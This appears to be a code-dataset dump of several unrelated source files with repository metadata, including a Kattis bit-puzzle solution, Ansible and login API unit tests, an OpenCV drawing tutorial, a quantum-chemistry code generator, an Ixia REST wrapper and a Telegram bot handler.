] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py |
#calss header
class _THUDDED():
def __init__(self,):
self.name = "THUDDED"
self.definitions = thud
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['thud']
| [
"[email protected]"
] | |
5d6b71efebb6a271a66b3250e0e7046636ba5f4d | 32f5bc330388a96877d93fdd7b21599a40735400 | /Python/bitbybit.py | 4d3828f05ee797f54e45115008e3d6f1e9edac58 | [] | no_license | alexlwn123/kattis | 670180d86f0863328a16e12ed937c2fefb3226a2 | c1163bae3fdaf95c1087b216c48e7e19059d3d38 | refs/heads/master | 2021-06-21T16:26:15.642449 | 2020-12-24T20:59:10 | 2020-12-24T20:59:10 | 152,286,208 | 1 | 1 | null | 2018-10-14T22:40:09 | 2018-10-09T16:40:48 | Java | UTF-8 | Python | false | false | 891 | py | def main():
n = int(input())
while n:
bits = [-1 for i in range(32)]
for i in range(n):
line = input().split()
if line[0] == 'SET':
bits[int(line[1])] = 1
elif line[0] == 'CLEAR':
bits[int(line[1])] = 0
elif line[0] == 'AND':
i, j = int(line[1]), int(line[2])
if bits[i] == 0 or bits[j] == 0:
bits[i] = 0
elif bits[i] == 1 and bits[j] == 1:
bits[i] = 1
else:
bits[i] = -1
elif line[0] == 'OR':
i, j = int(line[1]), int(line[2])
if bits[i] == 1 or bits[j] == 1:
bits[i] = 1
elif bits[i] == -1 or bits[j] == -1:
bits[i] = -1
n = int(input())
for i in range(32):
if bits[i] == -1:
bits[i] = "?"
else:
bits[i] = str(bits[i])
print("".join(bits[::-1]))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
736d6c3a30b3f19c88dbb1dfae335929360d9d92 | 27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f | /tests/unit/plugins/strategy/test_strategy_linear.py | 4c854f532cb71f360af50c823f22c8a95ec4c5f8 | [] | no_license | coll-test/notstdlib.moveitallout | eb33a560070bbded5032385d0aea2f3cf60e690b | 0987f099b783c6cf977db9233e1c3d9efcbcb3c7 | refs/heads/master | 2020-12-19T22:28:33.369557 | 2020-01-23T18:51:26 | 2020-01-23T18:51:26 | 235,865,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,853 | py | # Copyright (c) 2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.notstdlib.moveitallout.tests.unit.compat import unittest
from ansible_collections.notstdlib.moveitallout.tests.unit.compat.mock import patch, MagicMock
from ansible.executor.play_iterator import PlayIterator
from ansible.playbook import Playbook
from ansible.playbook.play_context import PlayContext
from ansible_collections.notstdlib.moveitallout.plugins.strategy.linear import StrategyModule
from ansible.executor.task_queue_manager import TaskQueueManager
from ansible_collections.notstdlib.moveitallout.tests.unit.mock.loader import DictDataLoader
from ansible_collections.notstdlib.moveitallout.tests.unit.mock.path import mock_unfrackpath_noop
class TestStrategyLinear(unittest.TestCase):
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_noop(self):
fake_loader = DictDataLoader({
"test_play.yml": """
- hosts: all
gather_facts: no
tasks:
- block:
- block:
- name: task1
debug: msg='task1'
failed_when: inventory_hostname == 'host01'
- name: task2
debug: msg='task2'
rescue:
- name: rescue1
debug: msg='rescue1'
- name: rescue2
debug: msg='rescue2'
""",
})
mock_var_manager = MagicMock()
mock_var_manager._fact_cache = dict()
mock_var_manager.get_vars.return_value = dict()
p = Playbook.load('test_play.yml', loader=fake_loader, variable_manager=mock_var_manager)
inventory = MagicMock()
inventory.hosts = {}
hosts = []
for i in range(0, 2):
host = MagicMock()
host.name = host.get_name.return_value = 'host%02d' % i
hosts.append(host)
inventory.hosts[host.name] = host
inventory.get_hosts.return_value = hosts
inventory.filter_hosts.return_value = hosts
mock_var_manager._fact_cache['host00'] = dict()
play_context = PlayContext(play=p._entries[0])
itr = PlayIterator(
inventory=inventory,
play=p._entries[0],
play_context=play_context,
variable_manager=mock_var_manager,
all_vars=dict(),
)
tqm = TaskQueueManager(
inventory=inventory,
variable_manager=mock_var_manager,
loader=fake_loader,
passwords=None,
forks=5,
)
tqm._initialize_processes(3)
strategy = StrategyModule(tqm)
strategy._hosts_cache = [h.name for h in hosts]
strategy._hosts_cache_all = [h.name for h in hosts]
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# debug: task1, debug: task1
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'debug')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, 'task1')
self.assertEqual(host2_task.name, 'task1')
# mark the second host failed
itr.mark_host_failed(hosts[1])
# debug: task2, meta: noop
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'debug')
self.assertEqual(host2_task.action, 'meta')
self.assertEqual(host1_task.name, 'task2')
self.assertEqual(host2_task.name, '')
# meta: noop, debug: rescue1
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, '')
self.assertEqual(host2_task.name, 'rescue1')
# meta: noop, debug: rescue2
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, '')
self.assertEqual(host2_task.name, 'rescue2')
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# end of iteration
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNone(host1_task)
self.assertIsNone(host2_task)
| [
"[email protected]"
] | |
46f958cb763206d56bc7da152abd572fd4efbcdd | f848ebf1adb25cc6d188f43fb02c06dad1b01651 | /script/test_inrm_login_params.py | 5495769f03c5f39cd9e6a55464118c0e8a19183c | [] | no_license | miao88318/day03_apiTestIHRM | 673320c724d9a661fa9ed120a62e0d82118719d9 | 213e4a498055e693993b21ca2bc7942af2a25c74 | refs/heads/master | 2022-07-28T04:39:05.390142 | 2020-05-21T07:06:23 | 2020-05-21T07:06:23 | 265,769,499 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | # ๅฏผๅ
import unittest
import logging
import requests
from parameterized import parameterized
import app
from api.login_api import TestLoginApi
from utils import assert_common, read_login_data
# ๅๅปบๆต่ฏ็ฑป,็ปงๆฟunittest.TestCase
class TestIHRMLogin(unittest.TestCase):
def setUp(self):
self.login_api = TestLoginApi()
def tearDown(self):
...
filename = app.BASE_DIR + "/data/login_data.json"
@parameterized.expand(read_login_data(filename))
def test01_login_success(self,case_name,jsonData,http_code,success,code,message):
# ๅ้็ปๅฝ่ฏทๆฑ
headers = {"Content-Type": "application/json"}
jsonData = jsonData
response = self.login_api.login(jsonData, headers)
result = response.json()
# print("็ปๆ:", result)
logging.info("็ปๆ: {}".format(result))
# ไฝฟ็จๅฐ่ฃ
็้็จๆญ่จๅฝๆฐ
assert_common(http_code, success, code, message, response, self)
| [
"[email protected]"
] | |
f5066bcfc3cd5773cce13c4c7639419c5523cd4a | f83ef53177180ebfeb5a3e230aa29794f52ce1fc | /opencv/opencv-3.4.2/samples/python/tutorial_code/core/BasicGeometricDrawing/basic_geometric_drawing.py | ec25d64a455c231b53d1115a53f1480bab1b6d82 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | msrLi/portingSources | fe7528b3fd08eed4a1b41383c88ee5c09c2294ef | 57d561730ab27804a3172b33807f2bffbc9e52ae | refs/heads/master | 2021-07-08T01:22:29.604203 | 2019-07-10T13:07:06 | 2019-07-10T13:07:06 | 196,183,165 | 2 | 1 | Apache-2.0 | 2020-10-13T14:30:53 | 2019-07-10T10:16:46 | null | UTF-8 | Python | false | false | 3,092 | py | import cv2 as cv
import numpy as np
W = 400
## [my_ellipse]
def my_ellipse(img, angle):
thickness = 2
line_type = 8
cv.ellipse(img,
(W / 2, W / 2),
(W / 4, W / 16),
angle,
0,
360,
(255, 0, 0),
thickness,
line_type)
## [my_ellipse]
## [my_filled_circle]
def my_filled_circle(img, center):
thickness = -1
line_type = 8
cv.circle(img,
center,
W / 32,
(0, 0, 255),
thickness,
line_type)
## [my_filled_circle]
## [my_polygon]
def my_polygon(img):
line_type = 8
# Create some points
ppt = np.array([[W / 4, 7 * W / 8], [3 * W / 4, 7 * W / 8],
[3 * W / 4, 13 * W / 16], [11 * W / 16, 13 * W / 16],
[19 * W / 32, 3 * W / 8], [3 * W / 4, 3 * W / 8],
[3 * W / 4, W / 8], [26 * W / 40, W / 8],
[26 * W / 40, W / 4], [22 * W / 40, W / 4],
[22 * W / 40, W / 8], [18 * W / 40, W / 8],
[18 * W / 40, W / 4], [14 * W / 40, W / 4],
[14 * W / 40, W / 8], [W / 4, W / 8],
[W / 4, 3 * W / 8], [13 * W / 32, 3 * W / 8],
[5 * W / 16, 13 * W / 16], [W / 4, 13 * W / 16]], np.int32)
ppt = ppt.reshape((-1, 1, 2))
cv.fillPoly(img, [ppt], (255, 255, 255), line_type)
# Only drawind the lines would be:
# cv.polylines(img, [ppt], True, (255, 0, 255), line_type)
## [my_polygon]
## [my_line]
def my_line(img, start, end):
thickness = 2
line_type = 8
cv.line(img,
start,
end,
(0, 0, 0),
thickness,
line_type)
## [my_line]
## [create_images]
# Windows names
atom_window = "Drawing 1: Atom"
rook_window = "Drawing 2: Rook"
# Create black empty images
size = W, W, 3
atom_image = np.zeros(size, dtype=np.uint8)
rook_image = np.zeros(size, dtype=np.uint8)
## [create_images]
## [draw_atom]
# 1. Draw a simple atom:
# -----------------------
# 1.a. Creating ellipses
my_ellipse(atom_image, 90)
my_ellipse(atom_image, 0)
my_ellipse(atom_image, 45)
my_ellipse(atom_image, -45)
# 1.b. Creating circles
my_filled_circle(atom_image, (W / 2, W / 2))
## [draw_atom]
## [draw_rook]
# 2. Draw a rook
# ------------------
# 2.a. Create a convex polygon
my_polygon(rook_image)
## [rectangle]
# 2.b. Creating rectangles
cv.rectangle(rook_image,
(0, 7 * W / 8),
(W, W),
(0, 255, 255),
-1,
8)
## [rectangle]
# 2.c. Create a few lines
my_line(rook_image, (0, 15 * W / 16), (W, 15 * W / 16))
my_line(rook_image, (W / 4, 7 * W / 8), (W / 4, W))
my_line(rook_image, (W / 2, 7 * W / 8), (W / 2, W))
my_line(rook_image, (3 * W / 4, 7 * W / 8), (3 * W / 4, W))
## [draw_rook]
cv.imshow(atom_window, atom_image)
cv.moveWindow(atom_window, 0, 200)
cv.imshow(rook_window, rook_image)
cv.moveWindow(rook_window, W, 200)
cv.waitKey(0)
cv.destroyAllWindows()
| [
"[email protected]"
] | |
8524d570eba1d25b43e2af97a5dbfbeccd5cddf8 | fc73e7249e227e5507976bd3825af037fbe6b46b | /legacy/lcc_codes/lcc_ccvv.py | 9e7115bdb17baa96e0163bf5d61d2702fd92c978 | [
"LicenseRef-scancode-philippe-de-muyter"
] | permissive | mussard/SecondQuantizationAlgebra | 32d10d85abae82da343c9b41764802f3f541d551 | ee32159e24d510654a6d38df391b544ec9ffeb4a | refs/heads/master | 2020-03-17T21:46:28.875095 | 2019-07-10T17:31:26 | 2019-07-10T17:31:26 | 133,974,911 | 0 | 0 | null | 2018-05-18T15:50:13 | 2018-05-18T15:50:13 | null | UTF-8 | Python | false | false | 7,597 | py | import secondQuantizationAlgebra as sqa
import writeCode
import geraldCode
sqa.options.verbose = False
# definitions
tag_core = sqa.options.core_type
tag_active = sqa.options.active_type
tag_virtual = sqa.options.virtual_type
a = sqa.index('Va', [tag_virtual], True)
b = sqa.index('Vb', [tag_virtual], True)
c = sqa.index('Vc', [tag_virtual], True)
d = sqa.index('Vd', [tag_virtual], True)
i = sqa.index('Ci', [tag_core], True)
j = sqa.index('Cj', [tag_core], True)
k = sqa.index('Ck', [tag_core], True)
l = sqa.index('Cl', [tag_core], True)
p = sqa.index('Ap', [tag_active], True)
q = sqa.index('Aq', [tag_active], True)
r = sqa.index('Ar', [tag_active], True)
s = sqa.index('As', [tag_active], True)
x1 = sqa.index('Au', [tag_active], True)
x2 = sqa.index('Av', [tag_active], True)
x3 = sqa.index('Aw', [tag_active], True)
x4 = sqa.index('Ax', [tag_active], True)
i1 = sqa.index('Cm', [tag_core], True)
i2 = sqa.index('Cn', [tag_core], True)
i3 = sqa.index('Co', [tag_core], True)
i4 = sqa.index('Co1', [tag_core], True)
a1 = sqa.index('Vg', [tag_virtual], True)
a2 = sqa.index('Vh', [tag_virtual], True)
a3 = sqa.index('Ve', [tag_virtual], True)
a4 = sqa.index('Vf', [tag_virtual], True)
#h0 one body term
hsym = sqa.symmetry((1,0), 1)
Dsym_a = sqa.symmetry((2,1, 0,3), 1)
Dsym_b = sqa.symmetry((0,3, 2,1), 1)
Dsym_c = sqa.symmetry((1,0, 3,2), 1)
K_C = sqa.tensor('int1c', [i1,i2], [hsym])
K_A = sqa.tensor('int1a', [x1,x2], [hsym])
K_V = sqa.tensor('int1v', [a1,a2], [hsym])
V_CA1 = sqa.tensor('int2ca1', [i1,x1, i2,x2], [Dsym_a, Dsym_b])
V_CA2 = sqa.tensor('int2ca2', [i1,x1, x2,i2], [])
V_CV1 = sqa.tensor('int2cv1', [i1,a1, i2,a2], [Dsym_a, Dsym_b])
V_CV2 = sqa.tensor('int2cv2', [i1,a1, a2,i2], [])
V_AV1 = sqa.tensor('int2av1', [x1,a1, x2,a2], [Dsym_a, Dsym_b])
V_AV2 = sqa.tensor('int2av2', [x1,a1, a2,x2], [])
V_C = sqa.tensor('int2c', [i1,i2, i3,i4], [Dsym_a, Dsym_b, Dsym_c])
V_A = sqa.tensor('int2a', [x1,x2, x3,x4], [Dsym_a, Dsym_b, Dsym_c])
V_V = sqa.tensor('int2v', [a1,a2, a3,a4], [Dsym_a, Dsym_b, Dsym_c])
deltaC = sqa.tensor('deltac', [i1,i2], [hsym])
deltaA = sqa.tensor('deltaa', [x1,x2], [hsym])
deltaV = sqa.tensor('deltav', [a1,a2], [hsym])
ampstring = "eecc" #amplitude string
AllTensors = ["t", "R", "int1c", "int1a", "int1v", "int2ca1", "int2ca2",\
"int2cv1", "int2cv2", "int2av1", "int2av2", "int2c", "int2a", "int2v",\
"E1", "E2", "E3", "S1", "S2", "T", "b", "p", "Ap",\
"P", "AP", "B", "V", "deltac", "deltaa", "deltav", "t1"]
CommentTensors = ["t", "R", "k", "k", "k", "W", "W",\
"W", "W", "W", "W", "W", "W", "W",\
"E1", "E2", "E3", "S1", "S2", "T", "b", "p", "Ap",\
"P", "AP", "B", "W", "delta", "delta", "delta", "t1"]
Domains = [ampstring, ampstring, "cc", "aa", "ee", "caca", "caac",\
"cece", "ceec", "aeae", "aeea", "cccc", "aaaa", "eeee",\
"aa", "aaaa", "aaaaaa", "aa", "aa", ampstring, ampstring, ampstring, ampstring,\
ampstring, ampstring, ampstring, ampstring, "cc", "aa", "ee", ampstring]
Usage = ["A", "R", "H", "H", "H", "H", "H",\
"H", "H", "H", "H", "H", "H", "H",\
"D", "D", "D", "D", "D", "A", "A", "A", "A",\
"A", "A", "A", "H", "D", "D", "D", "A"]
pDomains = "\tint f(int i) {\n"
pDomains += "\t\treturn 2*i;\n"
pDomains += "\t}\n"
pDomains += "\tFDomainDecl DomainDecls[1] = {\n"
pDomains += "\t\t{\"A\", \"a\", f}\n"
pDomains += "\t};"
CommentKey = {}
print "namespace MRLCC_CCVV {\n"
for tc in list(zip(AllTensors, CommentTensors)):
CommentKey[tc[0]] = tc[1]
geraldCode.writeTensors(AllTensors, CommentKey, Domains, Usage)
HD_C = sqa.term( 0.5, [""], [V_C, sqa.sfExOp([i1,i2,i3,i4])] )
HD_A = sqa.term( 0.5, [""], [V_A, sqa.sfExOp([x1,x2,x3,x4])] )
HD_V = sqa.term( 0.5, [""], [V_V, sqa.sfExOp([a1,a2,a3,a4])] )
HD_CA1 = sqa.term( 1.0, [""], [V_CA1, sqa.sfExOp([i1,x1,i2,x2])] )
HD_CA2 = sqa.term( 1.0, [""], [V_CA2, sqa.sfExOp([i1,x1,x2,i2])] )
HD_CV1 = sqa.term( 1.0, [""], [V_CV1, sqa.sfExOp([i1,a1,i2,a2])] )
HD_CV2 = sqa.term( 1.0, [""], [V_CV2, sqa.sfExOp([i1,a1,a2,i2])] )
HD_AV1 = sqa.term( 1.0, [""], [V_AV1, sqa.sfExOp([x1,a1,x2,a2])] )
HD_AV2 = sqa.term( 1.0, [""], [V_AV2, sqa.sfExOp([x1,a1,a2,x2])] )
T_C = sqa.term( 1.0, [""], [K_C, sqa.sfExOp([i1,i2])] )
T_A = sqa.term( 1.0, [""], [K_A, sqa.sfExOp([x1,x2])] )
T_V = sqa.term( 1.0, [""], [K_V, sqa.sfExOp([a1,a2])] )
Cin = sqa.tensor("p", [a,b,i,j], [Dsym_c])
Cout = sqa.tensor("Ap", [c,d,k,l], [Dsym_c])
#first excitation
E_aiEbj = sqa.term( 1.0, [""], [Cin, sqa.sfExOp([a, i]) , sqa.sfExOp([b,j])])
E_aiEbj2 = sqa.term( 1.0, [""], [Cout, sqa.sfExOp([l, d]) , sqa.sfExOp([k,c])])
commutator = []
commutator += sqa.commutator(HD_C, E_aiEbj)
commutator += sqa.commutator(HD_A, E_aiEbj)
commutator += sqa.commutator(HD_V, E_aiEbj)
commutator += sqa.commutator(HD_CA1, E_aiEbj)
commutator += sqa.commutator(HD_CA2, E_aiEbj)
commutator += sqa.commutator(HD_CV1, E_aiEbj)
commutator += sqa.commutator(HD_CV2, E_aiEbj)
commutator += sqa.commutator(HD_AV1, E_aiEbj)
commutator += sqa.commutator(HD_AV2, E_aiEbj)
commutator += sqa.commutator(T_C, E_aiEbj)
commutator += sqa.commutator(T_A, E_aiEbj)
commutator += sqa.commutator(T_V, E_aiEbj)
result = []
for t in commutator:
result += sqa.normalOrder(sqa.multiplyTerms(E_aiEbj2, t))
for t in result:
t.contractDeltaFuncs_new()
sqa.removeVirtOps_sf(result)
sqa.termChop(result)
sqa.combineTerms(result)
extendedR=[]
for t in result:
extendedR += sqa.contractCoreOps_sf(t)
for t in extendedR:
t.contractDeltaFuncs_new()
sqa.termChop(extendedR)
sqa.combineTerms(extendedR)
#for t in extendedR:
# print t
#print
result = []
rdmDelta = [deltaC, deltaA, deltaV]
#********this adds delta funcstion when we have repeat indices****************#
for r in extendedR:
result.append(geraldCode.replaceRepeatIndicesWithDeltas(r, rdmDelta))
print "//Number of terms : ", len(result)
print "\tFEqInfo EqsRes[%i] = {\n"%(len(result))
geraldCode.WriteCode_lccSimple(result, AllTensors, CommentKey)
print "\n\t};"
bindex = AllTensors.index("b")
Vindex = AllTensors.index("V")
E1index = AllTensors.index("deltac")
print pDomains
print "\tFEqInfo Overlap[4] = {"
print "\t\t{\"CDKL,LM,CDKM\", 2.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,DCKM\",-1.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,CDMK\",-1.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,DCMK\", 2.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t};"
print "\tstatic void GetMethodInfo(FMethodInfo &Out) {"
print "\t\tOut = FMethodInfo();"
print "\t\tOut.pName = \"MRLCC_CCVV\";"
print "\t\tOut.perturberClass = \"CCVV\";"
print "\t\tOut.pSpinClass = \"restricted\";"
print "\t\tOut.pTensorDecls = &TensorDecls[0];"
print "\t\tOut.nTensorDecls = %i;"%(len(Usage))
print "\t\tOut.pDomainDecls = &DomainDecls[0];"
print "\t\tOut.nDomainDecls = 0;"
print "\t\tOut.EqsRes = FEqSet(&EqsRes[0], %i, \"MRLCC_CCVV/Res\");"%(len(result))
print "\t\tOut.Overlap = FEqSet(&Overlap[0], 4, \"MRLCC_CCVV/Overlap\");"
print "\t};"
print "};"
'''
intmapkey = {"Va" : "nc:", "Vb" : "nc:", "Vc" : "nc:", "Vd" : "nc:", "a" : ":ncore", "b" : ":ncore", "c" : ":ncore", "d" : ":ncore"}
RDMmapkey = {"a" : ":", "b" : ":", "c" : ":", "d" : ":"}
writeCode.WriteCode(extendedR, True, intmapkey, RDMmapkey)
exit(0)
'''
| [
"[email protected]"
] | |
27e81b006347dc87e451cca4626b5d9a652d671e | 1eab574606dffb14a63195de994ee7c2355989b1 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/labelspace_buum91dgvsyw5nzs9sywjlbfnwywnl.py | 07c893743c85322fac1af7af913f0cc8e9d27226 | [
"MIT"
] | permissive | steiler/ixnetwork_restpy | 56b3f08726301e9938aaea26f6dcd20ebf53c806 | dd7ec0d311b74cefb1fe310d57b5c8a65d6d4ff9 | refs/heads/master | 2020-09-04T12:10:18.387184 | 2019-11-05T11:29:43 | 2019-11-05T11:29:43 | 219,728,796 | 0 | 0 | null | 2019-11-05T11:28:29 | 2019-11-05T11:28:26 | null | UTF-8 | Python | false | false | 3,341 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LabelSpace(Base):
"""This object configures the labels for the route range.
The LabelSpace class encapsulates a required labelSpace resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'labelSpace'
def __init__(self, parent):
super(LabelSpace, self).__init__(parent)
@property
def End(self):
"""The last label value available in the label space (range).
Returns:
number
"""
return self._get_attribute('end')
@End.setter
def End(self, value):
self._set_attribute('end', value)
@property
def LabelId(self):
"""The identifier for the label space.
Returns:
number
"""
return self._get_attribute('labelId')
@LabelId.setter
def LabelId(self, value):
self._set_attribute('labelId', value)
@property
def Mode(self):
"""Sets the Label mode.
Returns:
str(fixedLabel|incrementLabel)
"""
return self._get_attribute('mode')
@Mode.setter
def Mode(self, value):
self._set_attribute('mode', value)
@property
def Start(self):
"""The first label value available in the label space (range). The default is 16.
Returns:
number
"""
return self._get_attribute('start')
@Start.setter
def Start(self, value):
self._set_attribute('start', value)
@property
def Step(self):
"""The value to add for creating each additional label value.
Returns:
number
"""
return self._get_attribute('step')
@Step.setter
def Step(self, value):
self._set_attribute('step', value)
def update(self, End=None, LabelId=None, Mode=None, Start=None, Step=None):
"""Updates a child instance of labelSpace on the server.
Args:
End (number): The last label value available in the label space (range).
LabelId (number): The identifier for the label space.
Mode (str(fixedLabel|incrementLabel)): Sets the Label mode.
Start (number): The first label value available in the label space (range). The default is 16.
Step (number): The value to add for creating each additional label value.
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
self._update(locals())
| [
"[email protected]"
] | |
0e2bc5af47220d0e776cd4bfd2f23a7afeb398d4 | 789a540bbb79c334cbeaf3687876bfd939e4290b | /app/handlers/private/default/message/menu/sellers/show_category_sellers.py | db4caa4d7348436fd646cd2e4ad4ab67492dde55 | [] | no_license | ExissBrr/TRIGON-GARANT-BOT | 2cc96f5f6f195f4e76c164db4f8acafbfa5b7662 | 812acf060eb92e6fad21568a75e6dba7ce0da4d9 | refs/heads/main | 2023-07-04T18:22:43.507453 | 2021-08-17T14:51:30 | 2021-08-17T14:51:30 | 392,725,437 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | from aiogram.dispatcher.filters import Command
from aiogram.types import Message
from app import keyboards
from app.data import text
from app.data.types.category_data import ServiceCategoryType
from app.data.types.links import category_link
from app.data.types.seller_data import SellerStatus
from app.loader import dp
from app.utils.db_api.models.sellers import Seller
@dp.message_handler(Command('seller_category'))
async def show_sellers_in_category(message: Message, lang_code):
category_from_args = message.text.split(':')[-1]
await message.delete()
if category_from_args not in ServiceCategoryType.__dict__.values():
await message.answer(
text=text[lang_code].default.message.choose_category_among_list
)
return False
for key, value in ServiceCategoryType.__dict__.items():
if value == category_from_args:
photo_url = category_link[key]
sellers = await Seller.query.where(Seller.status == SellerStatus.ACTIVE).where(
Seller.category == category_from_args).gino.all()
await message.answer_photo(
photo=photo_url,
caption=text[lang_code].default.message.seller_list_in_category.format(category=category_from_args),
reply_markup=await keyboards.default.inline.sellers.show_seller_list_in_category.make_keyboard_sellers_list(
sellers=sellers,
category_name=category_from_args)
)
| [
"[email protected]"
] | |
076e2398568768a8a288eeb4e5dd7d351fd1ea99 | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/doc3d/Ablation4_ch016_ep003/Gather3_W_fix3blk_C_change/train/pyr_0s/L4/step09_0side_L4.py | f05661764ce1d26fa473aac73bbf00769cf8c4ad | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,007 | py | #############################################################################################################################################################################################################
from step08_c_use_G_generate_I_w_M_to_Wx_Wy_Wz_focus_to_Cx_Cy_focus_combine import I_w_M_to_W_to_C
from step08_b_use_G_generate_0_util import Tight_crop, Color_jit
from step09_c_train_step import Train_step_I_w_M_to_W_to_C
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
color_jit = Color_jit(do_ratio=0.6)
use_gen_op_p20 = I_w_M_to_W_to_C( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 0) ) ### ๆ็ฎๅ็ multi_model ็ I_to_Wxyz_to_Cxy_general ๆฏ ๅ
จ้จ้ฝๅๅณ Wz_pre_w_M, Wy_pre_w_M, Wx_pre_w_M, Cx_pre_w_M, Cy_pre_w_M๏ผ ๆไปฅไธ็ฎก wi/woDIV๏ผ Separate ๅ
จ่จญ True ๅฐฑๅฐไบ
use_train_step_p20 = Train_step_I_w_M_to_W_to_C( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 15), color_jit=color_jit ) ### ๆ็ฎๅ็ multi_model ็ I_to_Wxyz_to_Cxy_general ๆฏ ๅ
จ้จ้ฝๅๅณ Wz_pre_w_M, Wy_pre_w_M, Wx_pre_w_M, Cx_pre_w_M, Cy_pre_w_M๏ผ ๆไปฅไธ็ฎก wi/woDIV๏ผ Separate ๅ
จ่จญ True ๅฐฑๅฐไบ
from Exps_7_v3.doc3d.Ablation4_ch016_ep003.W_w_M_to_C_pyr.pyr_0s.L4.step09_0side_L4 import *
